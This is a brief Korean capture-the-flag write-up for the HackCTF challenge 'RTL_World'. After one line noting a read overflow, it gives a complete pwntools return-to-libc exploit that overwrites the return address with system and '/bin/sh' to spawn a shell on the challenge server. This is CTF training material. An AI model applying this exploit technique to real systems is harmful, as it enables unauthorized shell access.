HackCTF - RTL_World

 

 

read에서 취약점이 발생하고 문제 제목대로 RTL 를 진행하면 된다

 

from pwn import *

r = remote('ctf.j0n9hyun.xyz', 3010)
e = ELF('./rtl_world')

r.sendlineafter('>>> ','5')

payload = 'A'*144
payload += p32(e.sym['system'])
payload += 'AAAA'
payload += p32(e.search('/bin/sh\x00').next())

r.sendline(payload)

r.interactive()